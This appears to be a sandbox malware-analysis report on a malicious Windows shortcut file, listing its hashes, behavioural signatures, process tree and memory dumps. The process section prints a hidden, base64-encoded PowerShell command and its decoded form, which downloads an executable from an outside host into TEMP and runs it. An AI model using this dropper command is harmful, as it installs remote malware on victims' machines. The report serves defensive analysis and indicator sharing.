Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 22-05-2024 01:35
Static task: static1
Behavioral task: behavioral1 (sample: olineformN98898778.lnk; resource: win7-20231129-en)
Behavioral task: behavioral2 (sample: olineformN98898778.lnk; resource: win10v2004-20240508-en)
General
Target: olineformN98898778.lnk
Size: 1KB
MD5: 04e0fea48dfed1e026c3104e0d6aff88
SHA1: e639b0f5a486d5dffef28373ca2df867f99e7fb2
SHA256: 76a5649587a8874b1b1a5b3a37d281a4194e8a19947ca33f2d12d12d53509d39
SHA512: c9e5ff0b7d9ddd4b47a57438115acd29338bc5c1e98c9a5f3a61405de90a43eea60c3b1ecf0c25326d4a506b4ae2e2970e794a2f5e1c4d911e89aeed73dbeba4
Malware Config
Extracted URL: http://gpower.5gbfree.com/pix.exe
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 2532)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 2532), token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe (PID 2368) wrote to the memory of powershell.exe (PID 2532); three events recorded
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\olineformN98898778.lnk
   Signatures: Suspicious use of WriteProcessMemory
2. (child of 1) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABzAHQAYQByAHQAIAAiAHcAaQBuAGcAYQB0AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIABoAHQAdABwADoALwAvAGcAcABvAHcAZQByAC4ANQBnAGIAZgByAGUAZQAuAGMAbwBtAC8AcABpAHgALgBlAHgAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIAOwAgAHMAdABhAHIAdAAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIA
   Decoded -EncodedCommand (base64 of UTF-16LE): Import-Module BitsTransfer; start "wingat.exe"; Start-BitsTransfer http://gpower.5gbfree.com/pix.exe "$env:TEMP\wingat.exe"; start "$env:TEMP\wingat.exe"
   Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
memory/2532-38-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp (filesize: 4KB)
memory/2532-39-0x000000001B4D0000-0x000000001B7B2000-memory.dmp (filesize: 2.9MB)
memory/2532-43-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)
memory/2532-42-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)
memory/2532-41-0x0000000001F60000-0x0000000001F68000-memory.dmp (filesize: 32KB)
memory/2532-40-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)
memory/2532-44-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)
memory/2532-45-0x0000000002CB0000-0x0000000002CD2000-memory.dmp (filesize: 136KB)
memory/2532-46-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)
memory/2532-47-0x00000000028B0000-0x00000000028C2000-memory.dmp (filesize: 72KB)
memory/2532-48-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp (filesize: 9.6MB)